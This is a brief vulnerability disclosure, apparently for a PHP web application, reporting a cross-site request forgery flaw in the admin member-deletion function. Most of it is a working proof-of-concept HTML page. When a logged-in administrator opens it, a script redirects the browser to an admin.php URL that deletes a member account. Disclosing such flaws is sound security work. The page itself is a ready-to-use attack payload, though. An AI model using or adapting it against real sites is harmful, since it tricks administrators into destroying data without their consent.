Remove the admin interface has a csrf vulnerability

After the administrator logged in, open the following page：

save in payload.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<script type="text/javascript">
    window.location.href='http://192.168.1.2/admin.php?m=Member&a=admindelete&id=1';
</script>
</body>
</html>